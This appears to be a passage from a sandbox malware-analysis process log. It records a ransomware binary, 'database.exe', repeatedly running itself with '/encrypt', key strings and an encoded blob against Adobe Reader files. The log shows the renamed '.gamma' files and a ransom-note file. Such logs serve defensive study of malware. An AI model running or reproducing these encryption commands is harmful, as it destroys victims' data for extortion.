C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll"5⤵PID:3944
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup"5⤵PID:6020
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\Gj4uETi2-5J83D24f.[[email protected]]"5⤵PID:5296
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#Decrypt_Files_ReadMe#.rtf"5⤵PID:4172
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\k755tu4E-krPpNGe8.[[email protected]]"5⤵PID:5164
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\QEhoto9u-15V0a8Mj.[[email protected]]"5⤵PID:5732
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin.id-DA208E5B.[[email protected]].gamma"5⤵PID:1256
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini.id-DA208E5B.[[email protected]].gamma"5⤵PID:4708
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT.id-DA208E5B.[[email protected]].gamma"5⤵PID:4376
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:5812
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
PID:2844
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:5828
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:4924
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:2248
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:1784
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:4648
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:5056
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:1664
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:4624
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:6052
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:2388
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:3188
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.id-DA208E5B.[[email protected]].gamma"5⤵PID:4780
-
-
